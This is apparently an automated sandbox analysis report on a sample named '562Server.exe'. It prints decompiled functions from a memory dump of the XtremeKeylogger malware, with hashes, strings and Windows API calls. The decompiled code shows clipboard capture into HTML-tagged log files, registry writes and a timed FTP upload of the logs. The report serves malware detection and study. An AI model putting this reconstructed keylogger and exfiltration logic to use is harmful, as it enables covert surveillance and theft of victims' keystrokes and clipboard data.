Function 10008270, Relevance: 6.3, Strings: 5, Instructions: 93COMMON

Download Yara Rule

Strings

, xrefs: 10008347
<, xrefs: 10008311
&, xrefs: 100082FF
", xrefs: 10008335
>, xrefs: 10008323

Memory Dump Source

Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID: &$>$<$"$
API String ID: 0-2730314969
Opcode ID: 0cd1edd9943d5066e4ed9cbb4ed191d6f01f5bec750c3f69ea3f40f0141da2ec
Instruction ID: c2b4ba650b709cafa3e4efc2b6e91a51004f46039d2a3ae5a547a61f7c415082
Opcode Fuzzy Hash: 0cd1edd9943d5066e4ed9cbb4ed191d6f01f5bec750c3f69ea3f40f0141da2ec
Instruction Fuzzy Hash: 57314579A04189AFEF05DB94CC819DF77FDFB88680F509061F180A7209DA34AF028B65

Uniqueness

Uniqueness Score: -1.00%

Function 10008560, Relevance: 5.1, Strings: 4, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E10008560(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v300;
				intOrPtr _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v328;
				char _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				char _v368;
				char _v372;
				char _v376;
				char _v380;
				char _v384;
				intOrPtr* _t101;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t111;
				intOrPtr _t112;
				void* _t121;
				char _t133;
				intOrPtr _t149;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr _t156;
				char _t170;
				intOrPtr _t179;
				intOrPtr _t180;
				intOrPtr _t181;
				intOrPtr _t189;
				intOrPtr _t190;
				intOrPtr _t191;
				intOrPtr _t208;
				intOrPtr _t227;
				char _t235;
				intOrPtr _t244;
				intOrPtr _t245;
				void* _t246;
				void* _t247;
				intOrPtr _t250;
				intOrPtr _t261;
				intOrPtr _t268;
				intOrPtr _t280;
				intOrPtr _t281;
				intOrPtr _t282;
				intOrPtr _t307;
				intOrPtr _t309;
				intOrPtr _t310;
				void* _t314;

				_t306 = __esi;
				_t305 = __edi;
				_t101 = __eax +  *__eax;
				 *_t101 =  *_t101 + _t101;
				 *_t101 =  *_t101 + _t101;
				_t309 = _t310;
				_t247 = 0x2f;
				do {
					_push(0);
					_push(0);
					_t247 = _t247 - 1;
				} while (_t247 != 0);
				_push(_t247);
				_push(__ebx);
				_push(__esi);
				_t244 = _a16;
				_t102 = _a8;
				_push(_t309);
				_push(0x10008ba5);
				_push( *[fs:edx]);
				 *[fs:edx] = _t310;
				_t314 = _t102 -  *0x1000f68c; // 0xc1b9
				if(_t314 != 0) {
					__eflags = _t102 -  *0x1000f690; // 0xc1ba
					if(__eflags != 0) {
						__eflags = _t102 -  *0x1000f694; // 0xc1bc
						if(__eflags != 0) {
							__eflags = _t102 -  *0x1000f698; // 0x0
							if(__eflags != 0) {
								__eflags = _t102 -  *0x1000f69c; // 0xc1bd
								if(__eflags != 0) {
									__eflags = _t102 - 0x308;
									if(_t102 != 0x308) {
										__eflags = _t102 -  *0x1000f6a0; // 0xc1be
										if(__eflags != 0) {
											_push(_t244);
											_push(_a12);
											_push(_t102);
											_t103 = _a4;
											_push(_t103);
											L10004FE0();
											_v8 = _t103;
										} else {
											__eflags =  *0x1000e0b8;
											if( *0x1000e0b8 != 0) {
												_push(0);
												_push(0);
												_push(0);
												_t111 =  *0x1000e0b8; // 0x0
												_push(_t111);
												L10004F38();
												_t112 =  *0x1000e0b8; // 0x0
												_push(_t112);
												L10004F18();
												 *0x1000f6c4 = 0;
												 *0x1000f6c8 = 0;
												__eflags =  *0x1000f6c1 - 1;
												if(__eflags == 0) {
													E10006710( &_v380, _t247, 0,  *0x1000f6c4,  *0x1000f6c8);
													_t250 =  *0x1000f6b4; // 0x0
													E10003988( &_v384, _t250, L"SOFTWARE\\", __eflags);
													E1000577C(0x80000001, _t244, L"LastSize", _v384, __esi, __eflags, 2, _v380);
												}
											}
										}
									} else {
										__eflags =  *0x1000f6d4;
										if( *0x1000f6d4 != 0) {
											_t121 = E100069DC(0, _t244,  &_v12, __esi);
											__eflags = _t121 - 1;
											if(_t121 == 1) {
												_t268 =  *0x1000e0b4; // 0x0
												E10003A34(_v12, _t268);
												if(__eflags != 0) {
													E100037AC(0x1000e0b4, _v12);
													E10008270(L"\r\n\r\n", _t244,  &_v352, __edi, __esi);
													_push(_v352);
													_push(L"<FONT COLOR=\"red\">[Clipboard");
													_push(L" --- ");
													E10006B14(0x2f, _t244, 0x3a, 0x20, __edi, _t306,  &_v356);
													_push(_v356);
													_push(L"]</font>");
													E10008270(0x10008bcc, _t244,  &_v360, __edi, _t306);
													_push(_v360);
													_t133 =  *0x1000e0b4; // 0x0
													E10008270(_t133, _t244,  &_v364, _t305, _t306);
													_push(_v364);
													E10008270(0x10008bcc, _t244,  &_v368, _t305, _t306);
													_push(_v368);
													_push(L"<FONT COLOR=\"red\">[Clipboard End]</font>");
													E10008270(L"\r\n\r\n", _t244,  &_v372, _t305, _t306);
													_push(_v372);
													E100039EC();
													__eflags =  *0x1000e0b8 - 0xffffffff;
													if(__eflags != 0) {
														E100061F8(_v12,  &_v376, __eflags);
														E100037D0( &_v12, _v376);
														_push(0);
														_push( &_v32);
														_t149 = E1000391C(_v12) + _t148;
														__eflags = _t149;
														_push(_t149);
														_push(_v12);
														_t151 =  *0x1000e0b8; // 0x0
														_push(_t151);
														L10004FA0();
													}
													E100037AC(0x1000f6d0, L"qualquercoisarsrsr");
												}
											}
										}
									}
								} else {
									__eflags =  *0x1000f6d4;
									if( *0x1000f6d4 != 0) {
										_t152 =  *0x1000f69c; // 0xc1bd
										_v8 = _t152 + 1;
									}
								}
							} else {
								__eflags =  *0x1000f6d4;
								if( *0x1000f6d4 != 0) {
									_t102 =  *0x1000f6d4; // 0x0
									_push(_t102);
									L100050B8();
								}
								_push(0);
								_push(0);
								L10004EA0();
								_push(_t102);
								_push(E10008040);
								_push(0xd);
								L100050A0();
								 *0x1000f6d4 = E10008040;
							}
						} else {
							__eflags =  *0x1000f6d4;
							if( *0x1000f6d4 != 0) {
								_t156 =  *0x1000f6d4; // 0x0
								_push(_t156);
								L100050B8();
							}
							 *0x1000f6d4 = 0;
						}
					} else {
						E10003770( &_v12);
						__eflags =  *0x1000f6d4;
						if( *0x1000f6d4 != 0) {
							_t191 =  *0x1000f6d4; // 0x0
							_push(_t191);
							L100050B8();
						}
						__eflags =  *0x1000e0b8 - 0xffffffff;
						if(__eflags != 0) {
							_push(0);
							_push(0);
							_push(0);
							_t180 =  *0x1000e0b8; // 0x0
							_push(_t180);
							L10004F38();
							_push(0);
							_t181 =  *0x1000e0b8; // 0x0
							_push(_t181);
							L10004E80();
							__eflags = 0;
							_v28 = _t181;
							_v24 = 0;
							E10003BE4( &_v12, E10003FD4(_v28, _v24, 2, 0));
							_push(0);
							_push( &_v32);
							_push(_v28);
							_push(_v12);
							_t189 =  *0x1000e0b8; // 0x0
							_push(_t189);
							L10004F00();
							_push(2);
							_push(0);
							_push(0);
							_t190 =  *0x1000e0b8; // 0x0
							_push(_t190);
							L10004F38();
						}
						_push(0x80);
						_t280 =  *0x1000f684; // 0x0
						E10003988( &_v336, L"temp", _t280, __eflags);
						_push(E1000390C(_v336));
						L10004F30();
						_t281 =  *0x1000f684; // 0x0
						E10003988( &_v340, L"temp", _t281, __eflags);
						_push(E1000390C(_v340));
						L10004E30();
						_push(0);
						_push(0);
						_push(2);
						_push(0);
						_push(0);
						_push(0x40000000);
						_t282 =  *0x1000f684; // 0x0
						E10003988( &_v344, L"temp", _t282, __eflags);
						_t170 = E1000390C(_v344);
						_push(_t170);
						L10004DE0();
						_t245 = _t170;
						__eflags = _t245 - 0xffffffff;
						if(__eflags != 0) {
							E100061F8(_v12,  &_v348, __eflags);
							E100037D0( &_v12, _v348);
							_push(0);
							_push( &_v32);
							_t179 = E1000391C(_v12) + _t178;
							__eflags = _t179;
							_push(_t179);
							_t170 = _v12;
							_push(_t170);
							_push(_t245);
							L10004FA0();
						}
						_push(_t245);
						L10004DC0();
						_push(0);
						_push(0);
						L10004EA0();
						_push(_t170);
						_push(E10008040);
						_push(0xd);
						L100050A0();
						 *0x1000f6d4 = E10008040;
					}
					L43:
					_pop(_t261);
					 *[fs:eax] = _t261;
					_push(E10008BAC);
					E10003788( &_v384, 0x13);
					E10003788( &_v40, 2);
					return E10003788( &_v16, 2);
				}
				_t307 = _t244;
				E100050D0( &_v308, _t307);
				_push(0x8000);
				_push(0);
				_push(_t307);
				L10004F80();
				E10006E78(_t244, __edi, _t307,  &_v36, _v308, _v304,  &_v300, _v44);
				E100037D0( &_v40, _v36);
				E10006974( &_v16);
				_t246 = E10008438(_v16, _t244, __edi, _t307);
				_t208 =  *0x1000f6d0; // 0x0
				E10003A34(_t208, _v16);
				if(_t314 == 0) {
					L7:
					E10003770( &_v16);
					L8:
					E10003A34(_v40, 0);
					if(0 != 0) {
						_t317 = _t246 - 1;
						if(_t246 == 1) {
							E10008270(_v36, _t246,  &_v328, _t305, _t307);
							E10003988( &_v12, _v328, _v16, _t317);
							_t318 =  *0x1000e0b8 - 0xffffffff;
							if( *0x1000e0b8 != 0xffffffff) {
								E100061F8(_v12,  &_v332, _t318);
								E100037D0( &_v12, _v332);
								_push(0);
								_push( &_v32);
								_push(E1000391C(_v12) + _t224);
								_push(_v12);
								_t227 =  *0x1000e0b8; // 0x0
								_push(_t227);
								L10004FA0();
							}
						}
					}
					goto L43;
				}
				E10003A34(_v40, 0);
				if(0 == 0) {
					goto L7;
				} else {
					E100037AC(0x1000f6d0, _v16);
					_push(L"\r\n\r\n");
					_push(_v16);
					_push(0x10008bcc);
					_push(_v36);
					E100039EC();
					E10008270(L"\r\n\r\n", _t246,  &_v312, __edi, _t307);
					_push(_v312);
					_push(L"<FONT COLOR=\"blue\">[");
					_t235 =  *0x1000f6d0; // 0x0
					E10008270(_t235, _t246,  &_v316, _t305, _t307);
					_push(_v316);
					_push(0x10008c08);
					_push(L" --- ");
					E10006B14(0x2f, _t246, 0x3a, 0x20, _t305, _t307,  &_v320);
					_push(_v320);
					_push(L"</font>");
					E10008270(0x10008bcc, _t246,  &_v324, _t305, _t307);
					_push(_v324);
					E100039EC();
					goto L8;
				}
			}

0x10008560
0x10008560
0x10008560
0x10008562
0x10008566
0x10008569
0x1000856b
0x10008570
0x10008570
0x10008572
0x10008574
0x10008574
0x10008577
0x10008578
0x10008579
0x1000857a
0x1000857d
0x10008582
0x10008583
0x10008588
0x1000858b
0x1000858e
0x10008594
0x1000875b
0x10008761
0x100088e3
0x100088e9
0x1000890b
0x10008911
0x10008948
0x1000894e
0x1000896b
0x10008970
0x10008abc
0x10008ac2
0x10008b5b
0x10008b5f
0x10008b60
0x10008b61
0x10008b64
0x10008b65
0x10008b6a
0x10008ac8
0x10008ac8
0x10008acf
0x10008ad5
0x10008ad7
0x10008ad9
0x10008adb
0x10008ae0
0x10008ae1
0x10008ae6
0x10008aeb
0x10008aec
0x10008af1
0x10008afb
0x10008b05
0x10008b0c
0x10008b20
0x10008b34
0x10008b3f
0x10008b54
0x10008b54
0x10008b0c
0x10008acf
0x10008976
0x10008976
0x1000897d
0x10008988
0x1000898d
0x1000898f
0x10008998
0x1000899e
0x100089a3
0x100089b1
0x100089c1
0x100089c6
0x100089cc
0x100089d1
0x100089e9
0x100089ee
0x100089f4
0x10008a04
0x10008a09
0x10008a15
0x10008a1a
0x10008a1f
0x10008a30
0x10008a35
0x10008a3b
0x10008a4b
0x10008a50
0x10008a5e
0x10008a63
0x10008a6a
0x10008a75
0x10008a83
0x10008a88
0x10008a8d
0x10008a96
0x10008a96
0x10008a98
0x10008a9c
0x10008a9d
0x10008aa2
0x10008aa3
0x10008aa3
0x10008ab2
0x10008ab2
0x100089a3
0x1000898f
0x1000897d
0x10008950
0x10008950
0x10008957
0x1000895d
0x10008963
0x10008963
0x10008957
0x10008913
0x10008913
0x1000891a
0x1000891c
0x10008921
0x10008922
0x10008922
0x10008927
0x10008929
0x1000892b
0x10008930
0x10008936
0x10008937
0x10008939
0x1000893e
0x1000893e
0x100088eb
0x100088eb
0x100088f2
0x100088f4
0x100088f9
0x100088fa
0x100088fa
0x10008901
0x10008901
0x10008767
0x1000876a
0x1000876f
0x10008776
0x10008778
0x1000877d
0x1000877e
0x1000877e
0x10008783
0x1000878a
0x1000878c
0x1000878e
0x10008790
0x10008792
0x10008797
0x10008798
0x1000879d
0x1000879f
0x100087a4
0x100087a5
0x100087aa
0x100087ac
0x100087af
0x100087c6
0x100087cb
0x100087d0
0x100087d4
0x100087d8
0x100087d9
0x100087de
0x100087df
0x100087e4
0x100087e6
0x100087e8
0x100087ea
0x100087ef
0x100087f0
0x100087f0
0x100087f5
0x10008805
0x1000880b
0x1000881b
0x1000881c
0x1000882c
0x10008832
0x10008842
0x10008843
0x10008848
0x1000884a
0x1000884c
0x1000884e
0x10008850
0x10008852
0x10008862
0x10008868
0x10008873
0x10008878
0x10008879
0x1000887e
0x10008880
0x10008883
0x1000888e
0x1000889c
0x100088a1
0x100088a6
0x100088af
0x100088af
0x100088b1
0x100088b2
0x100088b5
0x100088b6
0x100088b7
0x100088b7
0x100088bc
0x100088bd
0x100088c2
0x100088c4
0x100088c6
0x100088cb
0x100088d1
0x100088d2
0x100088d4
0x100088d9
0x100088d9
0x10008b6d
0x10008b6f
0x10008b72
0x10008b75
0x10008b85
0x10008b92
0x10008ba4
0x10008ba4
0x100085a5
0x100085aa
0x100085af
0x100085b4
0x100085b6
0x100085b7
0x100085db
0x100085e6
0x100085ee
0x100085fb
0x100085fd
0x10008605
0x1000860a
0x100086cd
0x100086d0
0x100086d5
0x100086da
0x100086df
0x100086e5
0x100086e8
0x100086f7
0x10008708
0x1000870d
0x10008714
0x10008723
0x10008731
0x10008736
0x1000873b
0x10008746
0x1000874a
0x1000874b
0x10008750
0x10008751
0x10008751
0x10008714
0x100086e8
0x00000000
0x100086df
0x10008615
0x1000861a
0x00000000
0x10008620
0x10008628
0x1000862d
0x10008632
0x10008635
0x1000863a
0x10008645
0x10008655
0x1000865a
0x10008660
0x1000866b
0x10008670
0x10008675
0x1000867b
0x10008680
0x10008698
0x1000869d
0x100086a3
0x100086b3
0x100086b8
0x100086c6
0x00000000
0x100086c6

Strings

, xrefs: 100086A3
--- , xrefs: 10008680
[, xrefs: 10008660
, xrefs: 1000862D, 10008650

Memory Dump Source

Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID: $ --- $$[
API String ID: 0-341333612
Opcode ID: 844369069b05dfd62b440b7fafa7b9f06d8a9886853feb290a734d0b2ba6acd8
Instruction ID: 82ed3cb906cd8235e36a84cac39b9343783464e2b4201940a396f7c820685ddb
Opcode Fuzzy Hash: 844369069b05dfd62b440b7fafa7b9f06d8a9886853feb290a734d0b2ba6acd8
Instruction Fuzzy Hash: 6F513A78A00119AFEB11DB94CC81FDEB7B9FB48380F5084A1F548A7269DB31BF458B61

Uniqueness

Uniqueness Score: -1.00%

Function 100093E4, Relevance: 5.1, Strings: 4, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E100093E4(void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v92;
				intOrPtr _t13;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t30;
				intOrPtr _t34;
				intOrPtr _t37;
				char* _t38;
				void* _t39;
				void* _t53;
				intOrPtr _t58;
				char* _t61;
				intOrPtr _t62;
				char* _t66;
				void* _t67;
				void* _t71;
				void* _t72;
				intOrPtr* _t75;

				_t72 = __esi;
				_t71 = __edi;
				_t53 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(_t75);
				_push(0x100095de);
				_push( *[fs:eax]);
				 *[fs:eax] = _t75;
				E10008D4C(0);
				E100037D0( &_v8, L"XtremeKeylogger");
				if( *0x1000f688 == 0) {
					_t54 = E1000390C(_v8);
					 *0x1000f688 = E10006510(_t50, 1, E10008568);
				}
				_push(0);
				_t13 =  *0x1000f688; // 0x0
				_push(E1000662C(_t13));
				L100050A8();
				_t61 = L"qualquercoisarsrsr";
				E100037AC(0x1000f6d0, _t61);
				_push(0x80);
				_t17 =  *0x1000f684; // 0x0
				_push(E1000390C(_t17));
				L10004F30();
				_push(0);
				_push(0);
				_push(4);
				_push(0);
				_push(3);
				_push(0xc0000000);
				_t19 =  *0x1000f684; // 0x0
				_t20 = E1000390C(_t19);
				_push(_t20);
				L10004DE0();
				 *0x1000e0b8 = _t20;
				if( *0x1000e0b8 != 0xffffffff) {
					_t78 =  *0x1000f6c1 - 1;
					if( *0x1000f6c1 == 1) {
						 *0x1000f6c4 = E10006788(_t53, _t71, _t72, _t78);
						 *0x1000f6c8 = _t61;
						_push(0);
						_t37 =  *0x1000e0b8; // 0x0
						_push(_t37);
						L10004E80();
						_push(0);
						_push(_t37);
						_t38 =  *0x1000f6c4; // 0x0
						_t66 =  *0x1000f6c8; // 0x0
						_t39 = E10003FB0(_t38, _t66, 2, 0);
						if(_t66 != _v92) {
							_pop(_t67);
							if(__eflags > 0) {
								goto L8;
							}
						} else {
							_t80 = _t39 -  *_t75;
							_pop(_t67);
							if(_t39 >  *_t75) {
								L8:
								 *0x1000f6c4 = 0;
								 *0x1000f6c8 = 0;
							}
						}
						E10006710( &_v12, _t54, _t67,  *0x1000f6c4,  *0x1000f6c8);
						_t58 =  *0x1000f6b4; // 0x0
						E10003988( &_v16, _t58, L"SOFTWARE\\", _t80);
						E1000577C(0x80000001, _t53, L"LastSize", _v16, _t72, _t80, 2, _v12);
					}
					_push(7);
					_t24 =  *0x1000f684; // 0x0
					_push(E1000390C(_t24));
					L10004F30();
					_push(2);
					_push(0);
					_push(0);
					_t26 =  *0x1000e0b8; // 0x0
					_push(_t26);
					L10004F38();
					_push(0);
					_push(0);
					_t27 =  *0x1000f698; // 0x0
					_push(_t27);
					_t28 =  *0x1000f688; // 0x0
					_push(E1000662C(_t28));
					L10005088();
					_t30 =  *0x1000f688; // 0x0
					_push(E1000662C(_t30));
					L10005090();
					if( *0x1000f6c1 == 1) {
						if( *0x1000e0b0 != 0) {
							_t34 =  *0x1000e0b0; // 0x0
							E10006768(_t34);
						}
						 *0x1000e0b0 = E10006744(E10009204, 0, 0);
					}
				}
				_pop(_t62);
				 *[fs:eax] = _t62;
				_push(E100095E5);
				return E10003788( &_v16, 3);
			}

0x100093e4
0x100093e4
0x100093e4
0x100093e7
0x100093e9
0x100093eb
0x100093ef
0x100093f0
0x100093f5
0x100093f8
0x100093fb
0x10009408
0x10009414
0x10009423
0x10009431
0x10009431
0x10009436
0x10009438
0x10009442
0x10009443
0x1000944d
0x10009452
0x10009457
0x1000945c
0x10009466
0x10009467
0x1000946c
0x1000946e
0x10009470
0x10009472
0x10009474
0x10009476
0x1000947b
0x10009480
0x10009485
0x10009486
0x1000948b
0x10009497
0x1000949d
0x100094a4
0x100094af
0x100094b5
0x100094bb
0x100094bd
0x100094c2
0x100094c3
0x100094ca
0x100094cb
0x100094d0
0x100094d6
0x100094dc
0x100094e5
0x100094f0
0x100094f2
0x00000000
0x00000000
0x100094e7
0x100094e7
0x100094ea
0x100094ec
0x100094f4
0x100094f4
0x100094fe
0x100094fe
0x100094ec
0x10009517
0x10009525
0x10009530
0x10009542
0x10009542
0x10009547
0x10009549
0x10009553
0x10009554
0x10009559
0x1000955b
0x1000955d
0x1000955f
0x10009564
0x10009565
0x1000956a
0x1000956c
0x1000956e
0x10009573
0x10009574
0x1000957e
0x1000957f
0x10009584
0x1000958e
0x1000958f
0x1000959b
0x100095a4
0x100095a6
0x100095ab
0x100095ab
0x100095be
0x100095be
0x1000959b
0x100095c5
0x100095c8
0x100095cb
0x100095dd

Strings

LastSize, xrefs: 10009538
SOFTWARE\, xrefs: 1000952B
XtremeKeylogger, xrefs: 10009403
qualquercoisarsrsr, xrefs: 1000944D

Memory Dump Source

Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID: LastSize$SOFTWARE\$XtremeKeylogger$qualquercoisarsrsr
API String ID: 0-193067991
Opcode ID: b8b35e645ddaf236c2101e74a19ca3d57dbe3ac871cbe1f58d3791964739a7a7
Instruction ID: e10228e688af51e092dac2c6f3dee7a218e45a64ed0b3a8379d93de067ea2b0a
Opcode Fuzzy Hash: b8b35e645ddaf236c2101e74a19ca3d57dbe3ac871cbe1f58d3791964739a7a7
Instruction Fuzzy Hash: 86415E78604251AFF711EB70CC92F6E37A9E7483C0F518029F144AB6FECEB6A8419751

Uniqueness

Uniqueness Score: -1.00%

Function 10009204, Relevance: 5.1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E10009204() {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t38;
				void* _t39;
				void* _t51;
				intOrPtr _t55;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t61;
				void* _t63;
				intOrPtr _t71;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0x1000937d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t71;
				while(1) {
					_t51 = 0;
					goto L2;
					L2:
					_push(0x3e8);
					L10004F58();
					_t51 = _t51 + 1;
					if(_t51 < ( *0x1000f6bc + 1 + ( *0x1000f6bc + 1) * 4) * 0x3c) {
						goto L2;
					} else {
						_t75 =  *0x1000e0b8;
						if( *0x1000e0b8 != 0) {
							E10006B14(0x2e, _t51, 0x2e, 0x2d, 0x1000e0b8, 0x1000f6bc,  &_v8);
							E10003928( &_v8, 0x2e, L".html", _t75);
							_push(E1000390C(_v8));
							_t26 =  *0x1000f6ac; // 0x0
							_push(E1000390C(_t26));
							_t28 =  *0x1000f6b0; // 0x0
							_push(E1000390C(_t28));
							_t61 =  *0x1000f684; // 0x0
							E10003988( &_v12, 0x100093a0, _t61, _t75);
							_push(E1000390C(_v12));
							_t55 =  *0x1000f6a8; // 0x0
							E10003988( &_v16, _t55, 0x100093ac, _t75);
							_push(E1000390C(_v16));
							_t38 =  *0x1000f6a4; // 0x0
							_t39 = E1000390C(_t38);
							_pop(_t63);
							_pop(_t56);
							if(E10008DA4(_t39, _t51, _t56, _t63, 0x1000e0b8, 0x1000f6bc) != 0 &&  *0x1000f6c0 == 1) {
								_t78 =  *0x1000f6c1 - 1;
								if( *0x1000f6c1 == 1) {
									_push(0);
									_push(0);
									_push(0);
									_push( *0x1000e0b8);
									L10004F38();
									_push( *0x1000e0b8);
									L10004F18();
									 *0x1000f6c4 = 0;
									 *0x1000f6c8 = 0;
									E10006710( &_v20, _t56, _t63,  *0x1000f6c4,  *0x1000f6c8);
									_t57 =  *0x1000f6b4; // 0x0
									E10003988( &_v24, _t57, L"SOFTWARE\\", _t78);
									E1000577C(0x80000001, _t51, L"LastSize", _v24, 0x1000f6bc, _t78, 2, _v20);
								}
							}
						}
						continue;
					}
				}
			}

0x10009209
0x1000920a
0x1000920b
0x1000920c
0x1000920d
0x1000921e
0x10009223
0x10009226
0x10009229
0x10009229
0x10009229
0x1000922b
0x1000922b
0x10009230
0x10009235
0x10009241
0x00000000
0x10009243
0x10009243
0x10009246
0x10009258
0x10009265
0x10009272
0x10009273
0x1000927d
0x1000927e
0x10009288
0x10009291
0x10009297
0x100092a4
0x100092a8
0x100092b3
0x100092c0
0x100092c1
0x100092c6
0x100092cb
0x100092cc
0x100092d4
0x100092e7
0x100092ee
0x100092f4
0x100092f6
0x100092f8
0x100092fc
0x100092fd
0x10009304
0x10009305
0x1000930a
0x10009314
0x1000932d
0x1000933b
0x10009346
0x10009358
0x10009358
0x100092ee
0x100092d4
0x00000000
0x10009246
0x10009241

Strings

SOFTWARE\, xrefs: 10009341
FTP, xrefs: 1000928C
LastSize, xrefs: 1000934E
.html, xrefs: 10009260

Memory Dump Source

Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Yara matches

Similarity

API ID:
String ID: .html$FTP$LastSize$SOFTWARE\
API String ID: 0-3487691436
Opcode ID: f64d9703497d1778a1f724dcd6172282dd11fce0a9d43a36a9a9269ada9e7162
Instruction ID: 1ef3a85e4ac3c80801a06b688fa0acd6d065186ae52865efd5065228073e7574
Opcode Fuzzy Hash: f64d9703497d1778a1f724dcd6172282dd11fce0a9d43a36a9a9269ada9e7162
Instruction Fuzzy Hash: 9F317078500145BFF705DB64CD81BAF77ADEB453C0F904129F440AB6BACBB2AD509B61

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 562Server.exe PID: 4472 Parent PID: 6908 562Server.exeCOMMON

Executed Functions

Function 008BA5E2, Relevance: 1.6, APIs: 1, Instructions: 89synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 008BA689

Memory Dump Source

Source File: 00000004.00000002.301963762.00000000008BA000.00000040.00000001.sdmp, Offset: 008BA000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: b817aa69b76b77a1dca300a8b3d9cdb3ca7cf615f3311f8d36742270a68d02c0
Instruction ID: c3af8f443979c11572d1adcb3b4a3a0357563cfff72f62deb534c936ed976e9e
Opcode Fuzzy Hash: b817aa69b76b77a1dca300a8b3d9cdb3ca7cf615f3311f8d36742270a68d02c0
Instruction Fuzzy Hash: 5531A6B15093806FE712CB25CC45B96FFA8EF06310F08849AE984CB252D365E904C762

Uniqueness

Uniqueness Score: -1.00%

Function 008BA616, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 008BA689

Memory Dump Source

Source File: 00000004.00000002.301963762.00000000008BA000.00000040.00000001.sdmp, Offset: 008BA000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 157274d56c7534221f10e0c7e18992e8f17c1077c32aee9d4990b60a30a191df
Instruction ID: 5347a6aee4220ae41c56069cb557db85079015a62eea841d6d8b671716ed687c
Opcode Fuzzy Hash: 157274d56c7534221f10e0c7e18992e8f17c1077c32aee9d4990b60a30a191df
Instruction Fuzzy Hash: 412180B1504244AFE721DF29CD85BA6FBE8EF15310F18846AED85CB342D671E904CB66

Uniqueness

Uniqueness Score: -1.00%

Function 008BA873, Relevance: 1.6, APIs: 1, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,?,?), ref: 008BA8F2

Memory Dump Source

Source File: 00000004.00000002.301963762.00000000008BA000.00000040.00000001.sdmp, Offset: 008BA000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 71513a6606217a6db5e36412f0fcbe74028ab8977fc6fa62e0794b9713d254bd
Instruction ID: 94115f8146503a1240d2ccc9d9d84193fb1ee3f9cc515638bff132f8cd62edfb
Opcode Fuzzy Hash: 71513a6606217a6db5e36412f0fcbe74028ab8977fc6fa62e0794b9713d254bd
Instruction Fuzzy Hash: 8F2190B25093809FD712CB25DC40B92BFA8FF16210F0984AAE984CB263D2249909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 008BA2D2, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 008BA330

Memory Dump Source

Source File: 00000004.00000002.301963762.00000000008BA000.00000040.00000001.sdmp, Offset: 008BA000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 799e955aab00f288a90dd4ad75f8ea71f9d49c145e5f3a7660c5897fb2bca57c
Instruction ID: d59e1ceba1e4229707b209dbd1c895682a81d9151773fdcee6ede6a359f710e2
Opcode Fuzzy Hash: 799e955aab00f288a90dd4ad75f8ea71f9d49c145e5f3a7660c5897fb2bca57c
Instruction Fuzzy Hash: 3A21297140E3C09FD7238B259C54A52BFB4EF07624F0980DBDD84CF2A3D269A808DB62

Uniqueness

Uniqueness Score: -1.00%

Function 008BA8AA, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,?,?), ref: 008BA8F2

Memory Dump Source

Source File: 00000004.00000002.301963762.00000000008BA000.00000040.00000001.sdmp, Offset: 008BA000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 4edbe60a8cd61c31e3419fbab754631943de4ebfa8389259ab040e553f6ca677
Instruction ID: 1f6e59174eda2fcd9e5ac7402a1a6059f7efc15ab3b43512c1c9ef963a421378
Opcode Fuzzy Hash: 4edbe60a8cd61c31e3419fbab754631943de4ebfa8389259ab040e553f6ca677
Instruction Fuzzy Hash: BD1170715002448FDB25CF29D9847A6FBE8FF14720F08C46ADD59CB742D234D404DB62

Uniqueness

Uniqueness Score: -1.00%

Function 008BA2FE, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 008BA330

Memory Dump Source

